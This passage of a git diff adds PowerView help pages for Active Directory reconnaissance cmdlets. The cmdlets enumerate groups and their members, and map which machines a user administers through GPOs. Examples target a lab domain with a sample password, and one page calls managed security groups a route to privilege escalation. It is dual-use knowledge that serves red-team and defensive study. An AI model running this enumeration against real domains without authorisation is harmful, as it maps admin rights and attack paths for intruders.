+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPOGroup
+
+## NOTES
+
+## RELATED LINKS
+
+[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/)
+
diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md new file mode 100755 index 0000000..d42a4be --- /dev/null +++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md @@ -0,0 +1,258 @@ +# Get-DomainGPOUserLocalGroupMapping
+
+## SYNOPSIS
+Enumerates the machines where a specific domain user/group is a member of a specific
+local group, all through GPO correlation.
+If no user/group is specified, all
+discoverable mappings are returned.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup
+
+## SYNTAX
+
+```
+Get-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Takes a user/group name and optional domain, and determines the computers in the domain
+the user/group has local admin (or RDP) rights to.
+
+It does this by:
+ 1.
+resolving the user/group to its proper SID
+ 2.
+enumerating all groups the user/group is a current part of
+ and extracting all target SIDs to build a target SID list
+ 3.
+pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
+ Get-DomainGPOLocalGroup
+ 4.
+matching the target SID list to the queried GPO SID list
+ to enumerate all GPO the user is effectively applied with
+ 5.
+enumerating all OUs and sites and applicable GPO GUIs are
+ applied to through gplink enumerating
+ 6.
+querying for all computers under the given OUs or sites
+
+If no user/group is specified, all user/group -\> machine mappings discovered through
+GPO relationships are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-GPOLocation
+```
+
+Find all user/group -\> machine relationships where the user/group is a member
+of the local administrators group on target machines.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
+```
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-GPOLocation -UserName dfm -Domain dev.testlab.local
+```
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOUserLocalGroupMapping -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the user/group to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID.
+Defaults to local 'Administrators'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPOLocalGroupMapping
+
+A custom PSObject containing any target identity information and what local
+group memberships they're a part of through GPO correlation.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/)
+
diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md new file mode 100755 index 0000000..faaa082 --- /dev/null +++ b/docs/Recon/Get-DomainGroup.md @@ -0,0 +1,397 @@ +# Get-DomainGroup
+
+## SYNOPSIS
+Return all groups or specific group objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainGroup [[-Identity] <String[]>] [-MemberIdentity <String>] [-AdminCount] [-Domain <String>]
+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all group objects for
+the current domain are returned.
+To return the groups a specific user/group is
+a part of, use -MemberIdentity X to execute token groups enumeration.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGroup | select samaccountname
+```
+
+samaccountname
+--------------
+WinRMRemoteWMIUsers__
+Administrators
+Users
+Guests
+Print Operators
+Backup Operators
+...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGroup *admin* | select distinguishedname
+```
+
+distinguishedname
+-----------------
+CN=Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local
+CN=Schema Admins,CN=Users,DC=testlab,DC=local
+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
+CN=Domain Admins,CN=Users,DC=testlab,DC=local
+CN=DnsAdmins,CN=Users,DC=testlab,DC=local
+CN=Server Admins,CN=Users,DC=testlab,DC=local
+CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl
+```
+
+samaccountname
+--------------
+Server Admins
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local
+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))
+
+usncreated : 13245
+grouptype : -2147483646
+samaccounttype : 268435456
+samaccountname : Desktop Admins
+whenchanged : 8/10/2016 12:30:30 AM
+objectsid : S-1-5-21-890171859-3433809279-3366196753-1118
+objectclass : {top, group}
+cn : Desktop Admins
+usnchanged : 13255
+dscorepropagationdata : 1/1/1601 12:00:00 AM
+name : Desktop Admins
+distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+whencreated : 8/10/2016 12:29:43 AM
+instancetype : 4
+objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71
+objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroup -Credential $Cred
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))
+
+distinguishedname
+-----------------
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -MemberIdentity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the user/group member to query for group membership.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: UserName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AdminCount
+Switch.
+Return users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Group
+
+Custom PSObject with translated group property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md new file mode 100755 index 0000000..5381b2c --- /dev/null +++ b/docs/Recon/Get-DomainGroupMember.md @@ -0,0 +1,401 @@ +# Get-DomainGroupMember
+
+## SYNOPSIS
+Return the members of a specific domain group.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID
+
+## SYNTAX
+
+### None (Default)
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
+ [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### ManualRecurse
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-Recurse] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### RecurseUsingMatchingRule
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-RecurseUsingMatchingRule]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for the specified
+group matching the criteria.
+Each result is then rebound and the full user
+or group object is returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGroupMember "Desktop Admins"
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'Desktop Admins' | Get-DomainGroupMember -Recurse
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Testing Group
+GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
+```
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
+```
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
+
+### -------------------------- EXAMPLE 7 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'dev\domain admins' | Get-DomainGroupMember -Verbose
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
+
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : user1
+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108
+
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : Administrator
+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-500
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Recurse
+Switch.
+If the group member is a group, recursively try to query its members as well.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ManualRecurse
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RecurseUsingMatchingRule
+Switch.
+Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
+Much faster than manual recursion, but doesn't reveal cross-domain groups,
+and only returns user accounts (no nested group objects themselves).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: RecurseUsingMatchingRule
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GroupMember
+
+Custom PSObject with translated group member property fields.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/)
+
diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md new file mode 100755 index 0000000..13d48a2 --- /dev/null +++ b/docs/Recon/Get-DomainManagedSecurityGroup.md @@ -0,0 +1,177 @@ +# Get-DomainManagedSecurityGroup
+
+## SYNOPSIS
+Returns all security groups in the current (or target) domain that have a manager set.
+
+Author: Stuart Morgan (@ukstufus) \<stuart.morgan@mwrinfosecurity.com\>, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl
+
+## SYNTAX
+
+```
+Get-DomainManagedSecurityGroup [[-Domain] <String>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Authority to manipulate the group membership of AD security groups and distribution groups
+can be delegated to non-administrators by setting the 'managedBy' attribute.
+This is typically
+used to delegate management authority to distribution groups, but Windows supports security groups
+being managed in the same way.
+
+This function searches for AD groups which have a group manager set, and determines whether that
+user can manipulate group membership.
+This could be a useful method of horizontal privilege
+escalation, especially if the manager can manipulate the membership of a privileged group.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+```
+
+Store a list of all security groups with managers in group-managers.csv
+
